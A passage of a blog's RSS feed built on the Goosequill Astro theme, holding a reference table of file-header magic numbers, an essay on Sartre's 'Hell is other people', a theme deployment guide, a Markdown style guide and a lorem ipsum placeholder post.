|  **RAR**   |  `.rar`  |  **`52 61 72 21 1A 07 00`** (RAR 4.x) | -          |  `52 61 72 21` is the ASCII code for &quot;Rar!&quot;. The RAR 5.0 format begins with `52 61 72 21 1A 07 01 00`.                                  |     |
|  **7Z**    |  `.7z`   |  **`37 7A BC AF 27 1C`**              | -          |  `37 7A` is the ASCII code for &quot;7z&quot;.                                                                                  |     |
|  **GZIP**  |  `.gz`   |  **`1F 8B`**                          | -          | Commonly used for compression in Linux systems and network transmission.                                                                                        |     |
| **TAR**    |  `.tar`  | No unified file header                                | -          | TAR itself has no magic number and is usually identified through its internal structure.                                                                                   |     |

#### 3. Executable Formats

| File Format             | Common Extensions                    | File Header (Hex)                                                     | Notes                                                                                                 |     |
| ---------------- | ------------------------ | :------------------------------------------------------------- | :------------------------------------------------------------------------------------------------- | --- |
|  **Windows PE**  |  `.exe`, `.dll`, `.sys`  |  **`4D 5A`**                                                   |  `4D 5A` is the ASCII code for the letters &quot;MZ&quot; (from MS-DOS developer Mark Zbikowski). Modern PE files also contain an `PE` header (`50 45 00 00`) after the `MZ` header. |     |
|  **ELF**         | (no extension)                   |  **`7F 45 4C 46`**                                             |  `7F` is followed by `45 4C 46`, which is the ASCII code for &quot;ELF&quot;. It is the standard executable format on Linux/Unix.                                          |     |
|  **Mach-O**      | (no extension)                   |  `FE ED FA CE` (32-bit) `FE ED FA CF` (64-bit) `CA FE BA BE` (universal binary) | Executable format on macOS and iOS.                                                                                  |     |

#### 4. Documents &amp; Text

| File Format                   | Common Extensions                            | File Header (Hex)                  | Notes                                      |
| ---------------------- | -------------------------------- | :-------------------------- | :-------------------------------------- |
|  **PDF**               |  `.pdf`                          |  **`25 50 44 46`**          |  `25 50 44 46` is the ASCII code for &quot;%PDF&quot;.        |
|  **Microsoft Office**  |  `.doc`, `.xls`, `.ppt` (old versions)    |  `D0 CF 11 E0 A1 B1 1A E1`  | Old OLE compound document format; all legacy Office documents share this header.           |
|  **Microsoft Office**  |  `.docx`, `.xlsx`, `.pptx` (new versions) |  **`50 4B 03 04`**          | As mentioned earlier, they are ZIP files, so their file header is the same as ZIP.             |
|  **UTF-8 BOM**         |  `.txt` etc.                        |  `EF BB BF`                 |  **Byte Order Mark (BOM)**; not required, but it sometimes appears at the beginning of a file to indicate encoding. |

#### 5. Audio &amp; Video

| File Format | Common Extensions | File Header (Hex) | Notes |  
| --- | --- | :--- | :--- |  
| **MP3** | `.mp3` | `FF FB` or `FF F3` or `49 44 33` | MP3 files may have an ID3 tag (`49 44 33`, meaning &quot;ID3&quot;), or they may start directly with a frame sync signal (`FF F?`). |  
| **WAV** | `.wav` | **`52 49 46 46 ?? ?? ?? ?? 57 41 56 45`** | `52 49 46 46` is &quot;RIFF&quot;, and `57 41 56 45` is &quot;WAVE&quot;. |  
| **AVI** | `.avi` | **`52 49 46 46 ?? ?? ?? ?? 41 56 49 20`** | `52 49 46 46` is &quot;RIFF&quot;, and `41 56 49 20` is &quot;AVI &quot;. |  
| **MP4** | `.mp4` | `00 00 00 18 66 74 79 70 69 73 6F 6D` or `00 00 00 20 66 74 79 70 69 73 6F 6D`| It starts with a length field, but the key marker is `66 74 79 70`, meaning &quot;ftyp&quot;. |  
| **FLV** | `.flv` | **`46 4C 56 01`** | `46 4C 56` is the ASCII code for &quot;FLV&quot;. |

---

### 3. How to view and practice?

1. **Use a hex editor**:
    
    - **Recommended tools**: HxD (Windows), 010 Editor (cross-platform, professional), Bless Hex Editor (Linux), WinHex (Windows, professional).
        
    - **Method**: Open any file with these tools, and you will directly see its raw hexadecimal bytes. Compare them against the table above for verification.
        
2. **Use command-line tools (Linux/MacOS)**:
    
    - `file` command: `file example.jpg` The principle of this command is to read and analyze the file header information.
        
    - `xxd` or `hexdump` command: `xxd example.jpg | head -n 5` can display the first few lines of a file in hexadecimal form.
        
3. **Online tools**:
    
    - Search for &quot;online hex editor&quot; or &quot;file signature lookup&quot;. Many websites let you upload files or directly enter hex values for identification.</content:encoded></item><item><title>Sartre: Living in the Gaze of Others Is Living in Hell</title><link>https://goosequill.erina.top/en/blog/text/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/text/</guid><description>Test My page</description><pubDate>Wed, 16 Apr 2025 13:55:00 GMT</pubDate><content:encoded>## Sartre: Living in the Gaze of Others Is Living in Hell
&lt;progress value=&quot;90&quot; max=&quot;100&quot; style=&quot;width: 100%;&quot;&gt;&lt;/progress&gt;
&lt;font color=&quot;#646a73&quot;&gt;Total: 2,466 characters | Approx. 5 min read&lt;/font&gt;

## Thought Shuttle
In Dante&apos;s *Divine Comedy*, hell is a vast abyss that plunges straight from the surface to the center of the earth, shaped like a wide-topped, narrow-bottomed funnel. The souls of sinners, according to the severity of their earthly transgressions, are placed in different levels of this &quot;funnel&quot; to receive punishment: some sink into mud pits, enduring wind and rain; others are burned alive in raging flames, crying out in agony... All these horrors subtly suggest that &lt;font color=&quot;#c3d69b&quot;&gt;life on earth is precious, and one should cherish it while living.&lt;/font&gt;

But is the human world truly as wonderful as people imagine?

One thinker disagreed. For him, there exists something called &lt;font color=&quot;#d99694&quot;&gt;&quot;purgatory on earth.&quot;&lt;/font&gt; It may not be a tangible place, but like a dense fog, it shrouds the mind and invades one&apos;s spiritual world. Today&apos;s Thought Shuttle will fly into this thinker&apos;s intellectual universe to explore what this &quot;earthly purgatory&quot; really is. He is the great philosopher who masterfully combined &lt;font color=&quot;#00b050&quot;&gt;literary and intellectual depth — Sartre.&lt;/font&gt;

## Today&apos;s Protagonist: Sartre
&lt;font color=&quot;#00b050&quot;&gt;Jean-Paul Sartre&lt;/font&gt;, born June 21, 1905, in Paris, is one of the most important French philosophers of the 20th century and a leading representative of &lt;font color=&quot;#92cddc&quot;&gt;&quot;atheistic existentialism.&quot;&lt;/font&gt; A philosopher by vocation, he was also a gifted writer, producing numerous literary and dramatic works in an attempt to elucidate his philosophical ideas through skillful literary expression.

Sartre&apos;s childhood, like that of many children today, was steeped in the love of his grandparents. He spent most of his time with his maternal grandparents. His grandfather, a professor of linguistics, had a vast collection of books at home, and this knowledge-filled environment became a paradise for the young Sartre to absorb learning.

In 1929, the 24-year-old Sartre brilliantly achieved first place in the national competitive examination for teaching positions in secondary schools, where he also met &lt;font color=&quot;#00b050&quot;&gt;Simone de Beauvoir&lt;/font&gt;, who earned second place. Their astonishing and controversial love story has long been the subject of public fascination and gossip (curious? Search online).

As a thinker, Sartre&apos;s literary prowess was no less than that of other literary giants. He famously declined the 1964 Nobel Prize in Literature, giving the simple reason: &lt;font color=&quot;#92d050&quot;&gt;&quot;I decline all official honors.&quot;&lt;/font&gt;

Sartre&apos;s most famous idea is undoubtedly &quot;Hell is other people.&quot; Perhaps many of you are also experiencing the gloom encapsulated in this very phrase. 🚪[[Quote - No need for red-hot grills; hell is other people]]

### What He Thought: Hell Is Other People
**Keywords:**
&gt; Sartre&apos;s *No Exit*
&gt; Hell is other people
&gt; The relationship between self and others
&gt; Hell has no torture instruments — only &quot;other people&quot;

#### Background
In 1945, Sartre wrote a play titled &lt;font color=&quot;#00b050&quot;&gt;*No Exit* (Huis Clos)&lt;/font&gt;. The profound meaning and far-reaching influence of this play have far exceeded the scope of drama itself, sparking philosophical contemplation. Its central theme concerns the relationship between oneself and others.

The protagonists are three sinners after death, cast into a strange hell devoid of torture devices and mirrors. The three can only affirm their own existence through the gaze of others. At the same time, they are on guard against one another, hiding secrets, hoping to suppress their sordid pasts and project a favorable image in each other&apos;s eyes. A bizarre scene unfolds in this hell: &lt;mark style=&quot;background: #fb8b05;&quot;&gt;They each isolate themselves, yet mutually &quot;interrogate&quot; one another. Each becomes the scrutinizer of the others, while simultaneously being constrained ceaselessly by &quot;the gaze of others.&quot;&lt;/mark&gt;

#### Sartre&apos;s Famous Play *No Exit*
This is an ordeal — an unbearable torment. None of the three find peace; none can leave; none can be at ease, free, and authentic to themselves. Finally, one of the protagonists, &lt;font color=&quot;#00b050&quot;&gt;Garcin&lt;/font&gt;, realizes why this hell has no torture instruments, and cries out in anguish:

&gt; [!info]
&gt; &quot;I would never have believed it. Hell has no sulphur, no blazing stakes, no red-hot irons. What a &lt;span style=&quot;background:#d4b106&quot;&gt;joke!&lt;/span&gt;
&gt; No need for &lt;font color=&quot;#6425d0&quot;&gt;sulphur&lt;/font&gt;, &lt;font color=&quot;#6425d0&quot;&gt;stakes&lt;/font&gt;, or &lt;font color=&quot;#6425d0&quot;&gt;irons&lt;/font&gt; — hell is &lt;mark style=&quot;background: #f1441d;&quot;&gt;other people!&lt;/mark&gt;
&gt; The eyes of others are mirrors — or perhaps &lt;mark style=&quot;background: #158bb8;&quot;&gt;demonic mirrors from hell.&lt;/mark&gt;&quot;

Through the voice of the protagonist Garcin, Sartre articulates his thoughts on the relationship between self and others: A great many people in the world live in &quot;hell&quot; &lt;font color=&quot;#00b0f0&quot;&gt;because they are overly dependent on others&apos; judgments of themselves.&lt;/font&gt; This contains two layers of meaning:

First, &lt;font color=&quot;#e36c09&quot;&gt;we care too much about the gaze of others.&lt;/font&gt; Thus, when the relationship between self and others becomes discordant, we cannot find our own footing.

Second, when we &lt;font color=&quot;#e36c09&quot;&gt;cannot properly handle unfavorable judgments from others,&lt;/font&gt; their &quot;malicious&quot; evaluations become our &lt;mark style=&quot;background: #f1441d;&quot;&gt;hell&lt;/mark&gt;.

Living in this world, no one is a solitary individual; one must inevitably interact with those around them. Typically, we understand whether our actions are appropriate and whether our approaches help build good relationships through these interactions. &lt;font color=&quot;#92d050&quot;&gt;On nights when we &quot;reflect on ourselves three times a day,&quot; who among us doesn&apos;t search the day&apos;s memories for a parent&apos;s comment, a teacher&apos;s glance, or a classmate&apos;s reply?&lt;/font&gt;

But when a single word from another pierces you, or when during repeated rumination you feel they are subtly criticizing you, that they might no longer like you, that your relationship seems to be deteriorating — in that moment, don&apos;t you feel as if you&apos;ve arrived at the gates of hell, helpless yet resentful, anxious yet uneasy? Don&apos;t you feel that, though still on earth, you might as well be in purgatory because of the presence of others?

#### A Single Thought Can Turn Hell into Heaven

If others are hell, are we then trapped in this hell inescapably? Perhaps we should thank Sartre for not closing the door entirely. In his view, &lt;font color=&quot;#fac08f&quot;&gt;others may certainly be a formidable obstacle, but not one we cannot overcome.&lt;/font&gt;

##### How to resolve the problem that &quot;Hell is other people&quot;?

First, we &lt;font color=&quot;#ff0000&quot;&gt;draw too absolute a distinction&lt;/font&gt; between &quot;self&quot; and &quot;others&quot; in our consciousness, which reinforces an &lt;mark style=&quot;background: #20894d;&quot;&gt;&quot;egocentric&quot; mindset. Being overly self-centered inevitably leads to a lack of proper regard for others. In this case, we ourselves become the culprits in worsening our relationships, and we too must bear the responsibility for the &quot;torments of hell.&quot;&lt;/mark&gt;

Second, we fall into distress because we cannot properly handle the judgments and evaluations others make of us. But in truth, while others&apos; judgments are certainly important, they are for reference only. &lt;mark style=&quot;background: #20894d;&quot;&gt;*Treating them as the ultimate verdict is absolutely unacceptable.* If we live uncomfortably just to hear a flattering word or praise from others, or to reduce their negative comments or attacks on us, our authentic self will inevitably, in some midnight hour, fall into a tormented corner of the soul.&lt;/mark&gt;

Finally, &lt;font color=&quot;#ffc000&quot;&gt;if we cannot properly regard ourselves, we ourselves can also become our own hell.&lt;/font&gt; Here, I&apos;ll leave a blank for you to ponder: Why might oneself also become one&apos;s own hell?

In short, the conclusion is this: whether others become our hell depends largely on our own mindset. If we offer sincerity, &lt;font color=&quot;#0070c0&quot;&gt;if we care less about the gaze of others, and if we can just be ourselves — with this shift in thought, we will find ourselves no longer in hell, but in heaven.&lt;/font&gt;

### Usage Analysis

**Applicable Themes:** The relationship between self and others, properly handling others&apos; evaluations, being oneself, etc.

**Example:**
&gt; People always come to know themselves and affirm their existence through the gaze of others. Yet, the more we do this, the more we feel that the gaze of others is an eternal, inescapable presence. At this point, we begin to suffer a spiritual torment under that gaze: Did I do something wrong? Could I have done better? What should I do to get it right?
&gt; &lt;font color=&quot;#00b050&quot;&gt;Sartre encapsulated this psychological scenario in the phrase &quot;Hell is other people.&quot;&lt;/font&gt; Many people in this world, including you and me, are more or less experiencing this painful situation. It is precisely because we care too much about the gaze of others, and desire too strongly to establish a perfect self in their eyes, that we are driven to constantly judge ourselves according to others&apos; standards and &quot;revise&quot; ourselves repeatedly. &lt;font color=&quot;#e36c09&quot;&gt;Little do we realize that with each revision, we become utterly unrecognizable, and under the gaze of others, we perpetually cycle through our own journey through hell.&lt;/font&gt;</content:encoded></item><item><title>How to Deploy This Astro Theme</title><link>https://goosequill.erina.top/en/blog/deploying-goosequill-theme/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/deploying-goosequill-theme/</guid><description>A practical guide to taking the Goosequill theme from local development to production deployment.</description><pubDate>Fri, 07 Mar 2025 16:00:00 GMT</pubDate><content:encoded>## 1. Prepare your environment

This theme is built with Astro, so you should have these tools ready:

- Node.js 20+
- npm
- Git

After cloning the project, install dependencies:

```bash
git clone git@github.com:ErinaYip/goosequill.git
cd goosequill
npm install
```

Start local development with:

```bash
npm run dev
```

Create a production build with:

```bash
npm run build
```

This project does more than run `astro build`: it also runs Pagefind to generate search indexes. Because of that, `npm run build` is the best pre-deployment check.

## 2. Update the most important configuration first

Before deploying, review these files first.

### `astro.config.mjs`

The two most important fields here are `site` and `base`:

- `site`: your production URL, such as `https://blog.example.com`
- `base`: required if the site is deployed under a subpath, such as `https://example.com/blog/`

For a root-domain deployment, a typical setup looks like this:

```js
site: &apos;https://blog.example.com&apos;,
base: &apos;/&apos;,
```

### `src/config.ts`

This file controls the site title, description, RSS, search, table of contents, and pagination behavior.

At minimum, review these fields:

- `title`
- `description`
- `defaultLocale`
- `rss.enable`
- `search.enable`
- `pagination.posts_per_page`

For single-language mode:

```ts
defaultLocale: &apos;en&apos;
```

For multi-language mode:

```ts
defaultLocale: undefined
```

In this theme, routing works like this:

- Single-language mode uses unprefixed routes such as `/about` and `/blog/post`
- Multi-language mode uses locale-prefixed routes such as `/en/about` and `/zh-cn/blog/post`

## 3. Organize your content correctly

Blog posts live under `src/content/blog/`, with one directory per post.

For example:

```text
src/content/blog/my-post/
  index_en.mdx
  index_zh-cn.mdx
```

A practical recommendation:

- For a single-language site, keep at least the file for your default locale
- For a multilingual site, create one `index_&lt;locale&gt;.mdx` file per locale

If you only publish in English, the simplest setup is to keep English files and set:

```ts
defaultLocale: &apos;en&apos;
```

## 4. Validate the production build locally

Before going live, run:

```bash
npm run build
npm run preview
```

`npm run preview` serves the production output locally, which is much closer to the real deployed environment than development mode.

Check these pages and features carefully:

- Home page, blog index, and blog post pages
- Image loading
- RSS feed accessibility
- Search behavior
- Language switcher links
- `sitemap-index.xml` generation

## 5. Easiest deployment targets: Vercel / Netlify / Cloudflare Pages

Because this is a static site, it works well on most static hosting providers.

### Option A: Vercel

When importing the repo into Vercel, you can usually use:

- Build Command: `npm run build`
- Output Directory: `dist`

### Option B: Netlify

Typical Netlify settings:

- Build command: `npm run build`
- Publish directory: `dist`

### Option C: Cloudflare Pages

Typical Cloudflare Pages settings:

- Build command: `npm run build`
- Build output directory: `dist`

## 6. What to watch for on GitHub Pages

If you deploy to GitHub Pages, `base` is usually the most important setting.

If your site is published at:

```text
https://&lt;user&gt;.github.io/goosequill/
```

then you will typically want:

```js
base: &apos;/goosequill&apos;
```

You should also update `site` to match the final public URL.

If `base` is wrong, common symptoms include:

- CSS returning 404
- JavaScript returning 404
- images not loading
- broken internal links
- search assets failing to load

## 7. Final checks before connecting a custom domain

Before switching to your real domain, verify that:

- `site` in `astro.config.mjs` matches the real domain
- `base` matches the actual deployment path
- RSS is accessible
- sitemap output matches the site URL
- social share metadata renders correctly

If RSS and sitemap are enabled while `site` still points to a placeholder domain, the generated absolute URLs will be wrong.

## 8. Common problems

### The build succeeds, but styles are missing

Check these first:

- whether `base` is correct
- whether your assets use the correct paths
- whether your platform actually published the `dist/` directory

### Search opens but returns no results

This theme uses Pagefind, so search depends on the generated index files. Confirm that:

- you deployed the output from `npm run build`
- `dist/pagefind/` was published together with the rest of the site

### Multilingual pages return 404

Check these first:

- whether `defaultLocale` in `src/config.ts` matches your intended mode
- whether page and post files use the expected locale suffixes
- whether the matching content files actually exist for the current locale

## 9. A simple recommended deployment workflow

If you want a reliable workflow, use this one:

1. Fork or clone the project
2. Update `site` and `base` in `astro.config.mjs`
3. Update the site title, description, and language mode in `src/config.ts`
4. Add your own content
5. Run `npm run build`
6. Run `npm run preview`
7. Push to your Git repository
8. Connect the repository to Vercel, Netlify, or Cloudflare Pages
9. After deployment, verify RSS, sitemap, and search

## Summary

Deploying this theme is not complicated. In practice, it comes down to three things:

- configure `site` and `base` correctly
- make sure the language mode in `src/config.ts` matches your content files
- always validate with `npm run build`

If those three parts are correct, deployment on most static hosting providers should be smooth.

A useful follow-up expansion for this post would be a dedicated section on:

- deploying to GitHub Pages
- configuring a custom domain
- adding comments or analytics</content:encoded></item><item><title>Markdown Style Guide</title><link>https://goosequill.erina.top/en/blog/markdown-style-guide/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/markdown-style-guide/</guid><description>Here is a sample of some basic Markdown syntax that can be used when writing Markdown content in Astro.</description><pubDate>Tue, 18 Jun 2024 16:00:00 GMT</pubDate><content:encoded>Here is a sample of some basic Markdown syntax that can be used when writing Markdown content in Astro.

## Headings

The following HTML `&lt;h1&gt;`—`&lt;h6&gt;` elements represent six levels of section headings. `&lt;h1&gt;` is the highest section level while `&lt;h6&gt;` is the lowest.

# H1

## H2

### H3

#### H4

##### H5

###### H6

## Paragraph

Xerum, quo qui aut unt expliquam qui dolut labo. Aque venitatiusda cum, voluptionse latur sitiae dolessi aut parist aut dollo enim qui voluptate ma dolestendit peritin re plis aut quas inctum laceat est volestemque commosa as cus endigna tectur, offic to cor sequas etum rerum idem sintibus eiur? Quianimin porecus evelectur, cum que nis nust voloribus ratem aut omnimi, sitatur? Quiatem. Nam, omnis sum am facea corem alique molestrunt et eos evelece arcillit ut aut eos eos nus, sin conecerem erum fuga. Ri oditatquam, ad quibus unda veliamenimin cusam et facea ipsamus es exerum sitate dolores editium rerore eost, temped molorro ratiae volorro te reribus dolorer sperchicium faceata tiustia prat.

Itatur? Quiatae cullecum rem ent aut odis in re eossequodi nonsequ idebis ne sapicia is sinveli squiatum, core et que aut hariosam ex eat.

## Images

### Syntax

```markdown
![Alt text](./full/or/relative/path/of/image)
```

### Output

![blog placeholder](blog-placeholder-about.jpg)

## Blockquotes

The blockquote element represents content that is quoted from another source, optionally with a citation which must be within a `footer` or `cite` element, and optionally with in-line changes such as annotations and abbreviations.

### Blockquote without attribution

#### Syntax

```markdown
&gt; Tiam, ad mint andaepu dandae nostion secatur sequo quae.  
&gt; **Note** that you can use _Markdown syntax_ within a blockquote.
```

#### Output

&gt; Tiam, ad mint andaepu dandae nostion secatur sequo quae.  
&gt; **Note** that you can use _Markdown syntax_ within a blockquote.

### Blockquote with attribution

#### Syntax

```markdown
&gt; Don&apos;t communicate by sharing memory, share memory by communicating.
&gt; — &lt;cite&gt;Rob Pike[^1]&lt;/cite&gt;
```

#### Output

&gt; Don&apos;t communicate by sharing memory, share memory by communicating.
&gt; — &lt;cite&gt;Rob Pike[^1]&lt;/cite&gt;

[^1]: The above quote is excerpted from Rob Pike&apos;s [talk](https://www.youtube.com/watch?v=PAAkCSZUG1c) during Gopherfest, November 18, 2015.

## Tables

### Syntax

```markdown
| Italics   | Bold     | Code   |
| --------- | -------- | ------ |
| _italics_ | **bold** | `code` |
```

### Output

| Italics   | Bold     | Code   |
| --------- | -------- | ------ |
| _italics_ | **bold** | `code` |

## Code Blocks

### Syntax

we can use 3 backticks ``` in new line and write snippet and close with 3 backticks on new line and to highlight language specific syntax, write one word of language name after first 3 backticks, for eg. html, javascript, css, markdown, typescript, txt, bash

````markdown
```html
&lt;!doctype html&gt;
&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;meta charset=&quot;utf-8&quot; /&gt;
    &lt;title&gt;Example HTML5 Document&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;p&gt;Test&lt;/p&gt;
  &lt;/body&gt;
&lt;/html&gt;
```
````

### Output

```html
&lt;!doctype html&gt;
&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;meta charset=&quot;utf-8&quot; /&gt;
    &lt;title&gt;Example HTML5 Document&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;p&gt;Test&lt;/p&gt;
  &lt;/body&gt;
&lt;/html&gt;
```


## Mermaid Diagrams

### Syntax

````markdown
```mermaid
flowchart TD
  A[Write Markdown] --&gt; B[Render Mermaid]
  B --&gt; C[Display Diagram]
```
````

### Output

```mermaid
flowchart TD
  A[Write Markdown] --&gt; B[Render Mermaid]
  B --&gt; C[Display Diagram]
```

## List Types

### Ordered List

#### Syntax

```markdown
1. First item
2. Second item
3. Third item
```

#### Output

1. First item
2. Second item
3. Third item

### Unordered List

#### Syntax

```markdown
- List item
- Another item
- And another item
```

#### Output

- List item
- Another item
- And another item

### Nested list

#### Syntax

```markdown
- Fruit
  - Apple
  - Orange
  - Banana
- Dairy
  - Milk
  - Cheese
```

#### Output

- Fruit
  - Apple
  - Orange
  - Banana
- Dairy
  - Milk
  - Cheese

## Other Elements — abbr, sub, sup, kbd, mark

### Syntax

```markdown
&lt;abbr title=&quot;Graphics Interchange Format&quot;&gt;GIF&lt;/abbr&gt; is a bitmap image format.

H&lt;sub&gt;2&lt;/sub&gt;O

X&lt;sup&gt;n&lt;/sup&gt; + Y&lt;sup&gt;n&lt;/sup&gt; = Z&lt;sup&gt;n&lt;/sup&gt;

Press &lt;kbd&gt;CTRL&lt;/kbd&gt; + &lt;kbd&gt;ALT&lt;/kbd&gt; + &lt;kbd&gt;Delete&lt;/kbd&gt; to end the session.

Most &lt;mark&gt;salamanders&lt;/mark&gt; are nocturnal, and hunt for insects, worms, and other small creatures.
```

### Output

&lt;abbr title=&quot;Graphics Interchange Format&quot;&gt;GIF&lt;/abbr&gt; is a bitmap image format.

H&lt;sub&gt;2&lt;/sub&gt;O

X&lt;sup&gt;n&lt;/sup&gt; + Y&lt;sup&gt;n&lt;/sup&gt; = Z&lt;sup&gt;n&lt;/sup&gt;

Press &lt;kbd&gt;CTRL&lt;/kbd&gt; + &lt;kbd&gt;ALT&lt;/kbd&gt; + &lt;kbd&gt;Delete&lt;/kbd&gt; to end the session.

Most &lt;mark&gt;salamanders&lt;/mark&gt; are nocturnal, and hunt for insects, worms, and other small creatures.</content:encoded></item><item><title>Third post</title><link>https://goosequill.erina.top/en/blog/third-post/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/third-post/</guid><description>Lorem ipsum dolor sit amet</description><pubDate>Thu, 21 Jul 2022 16:00:00 GMT</pubDate><content:encoded>## Lorem

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Vitae ultricies leo integer malesuada nunc vel risus commodo viverra. Adipiscing enim eu turpis egestas pretium. Euismod elementum nisi quis eleifend quam adipiscing. In hac habitasse platea dictumst vestibulum. Sagittis purus sit amet volutpat. Netus et malesuada fames ac turpis egestas. Eget magna fermentum iaculis eu non diam phasellus vestibulum lorem. Varius sit amet mattis vulputate enim. Habitasse platea dictumst quisque sagittis. Integer quis auctor elit sed vulputate mi. Dictumst quisque sagittis purus sit amet.

### Morbi

Morbi tristique senectus et netus. Id semper risus in hendrerit gravida rutrum quisque non tellus. Habitasse platea dictumst quisque sagittis purus sit amet. Tellus molestie nunc non blandit massa. Cursus vitae congue mauris rhoncus. Accumsan tortor posuere ac ut. Fringilla urna porttitor rhoncus dolor. Elit ullamcorper dignissim cras tincidunt lobortis. In cursus turpis massa tincidunt dui ut ornare lectus. Integer feugiat scelerisque varius morbi enim nunc. Bibendum neque egestas congue quisque egestas diam. Cras ornare arcu dui vivamus arcu felis bibendum. Dignissim suspendisse in est ante in nibh mauris. Sed tempus urna et pharetra pharetra massa massa ultricies mi.

## Ipsum

Morbi tristique senectus et netus. Id semper risus in hendrerit gravida rutrum quisque non tellus. Habitasse platea dictumst quisque sagittis purus sit amet. Tellus molestie nunc non blandit massa. Cursus vitae congue mauris rhoncus. Accumsan tortor posuere ac ut. Fringilla urna porttitor rhoncus dolor. Elit ullamcorper dignissim cras tincidunt lobortis. In cursus turpis massa tincidunt dui ut ornare lectus. Integer feugiat scelerisque varius morbi enim nunc. Bibendum neque egestas congue quisque egestas diam. Cras ornare arcu dui vivamus arcu felis bibendum. Dignissim suspendisse in est ante in nibh mauris. Sed tempus urna et pharetra pharetra massa massa ultricies mi.

### Tristique

Mollis nunc sed id semper risus in. Convallis a cras semper auctor neque. Diam sit amet nisl suscipit. Lacus viverra vitae congue eu consequat ac felis donec. Egestas integer eget aliquet nibh praesent tristique magna sit amet. Eget magna fermentum iaculis eu non diam. In vitae turpis massa sed elementum. Tristique et egestas quis ipsum suspendisse ultrices. Eget lorem dolor sed viverra ipsum. Vel turpis nunc eget lorem dolor sed viverra. Posuere ac ut consequat semper viverra nam. Laoreet suspendisse interdum consectetur libero id faucibus. Diam phasellus vestibulum lorem sed risus ultricies tristique. Rhoncus dolor purus non enim praesent elementum facilisis. Ultrices tincidunt arcu non sodales neque. Tempus egestas sed sed risus pretium quam vulputate. Viverra suspendisse potenti nullam ac tortor vitae purus faucibus ornare. Fringilla urna porttitor rhoncus dolor purus non. Amet dictum sit amet justo donec enim.

## Dolor

Mollis nunc sed id semper risus in. Convallis a cras semper auctor neque. Diam sit amet nisl suscipit. Lacus viverra vitae congue eu consequat ac felis donec. Egestas integer eget aliquet nibh praesent tristique magna sit amet. Eget magna fermentum iaculis eu non diam. In vitae turpis massa sed elementum. Tristique et egestas quis ipsum suspendisse ultrices. Eget lorem dolor sed viverra ipsum. Vel turpis nunc eget lorem dolor sed viverra. Posuere ac ut consequat semper viverra nam. Laoreet suspendisse interdum consectetur libero id faucibus. Diam phasellus vestibulum lorem sed risus ultricies tristique. Rhoncus dolor purus non enim praesent elementum facilisis. Ultrices tincidunt arcu non sodales neque. Tempus egestas sed sed risus pretium quam vulputate. Viverra suspendisse potenti nullam ac tortor vitae purus faucibus ornare. Fringilla urna porttitor rhoncus dolor purus non. Amet dictum sit amet justo donec enim.

### Senectus

Mattis ullamcorper velit sed ullamcorper morbi tincidunt. Tortor posuere ac ut consequat semper viverra. Tellus mauris a diam maecenas sed enim ut sem viverra. Venenatis urna cursus eget nunc scelerisque viverra mauris in. Arcu ac tortor dignissim convallis aenean et tortor at. Curabitur gravida arcu ac tortor dignissim convallis aenean et tortor. Egestas tellus rutrum tellus pellentesque eu. Fusce ut placerat orci nulla pellentesque dignissim enim sit amet. Ut enim blandit volutpat maecenas volutpat blandit aliquam etiam. Id donec ultrices tincidunt arcu. Id cursus metus aliquam eleifend mi.

## Sit

Mattis ullamcorper velit sed ullamcorper morbi tincidunt. Tortor posuere ac ut consequat semper viverra. Tellus mauris a diam maecenas sed enim ut sem viverra. Venenatis urna cursus eget nunc scelerisque viverra mauris in. Arcu ac tortor dignissim convallis aenean et tortor at. Curabitur gravida arcu ac tortor dignissim convallis aenean et tortor. Egestas tellus rutrum tellus pellentesque eu. Fusce ut placerat orci nulla pellentesque dignissim enim sit amet. Ut enim blandit volutpat maecenas volutpat blandit aliquam etiam. Id donec ultrices tincidunt arcu. Id cursus metus aliquam eleifend mi.

## Amet

Tempus quam pellentesque nec nam aliquam sem. Risus at ultrices mi tempus imperdiet. Id porta nibh venenatis cras sed felis eget velit. Ipsum a arcu cursus vitae. Facilisis magna etiam tempor orci eu lobortis elementum. Tincidunt dui ut ornare lectus sit. Quisque non tellus orci ac. Blandit libero volutpat sed cras. Nec tincidunt praesent semper feugiat nibh sed pulvinar proin gravida. Egestas integer eget aliquet nibh praesent tristique magna.</content:encoded></item></channel></rss>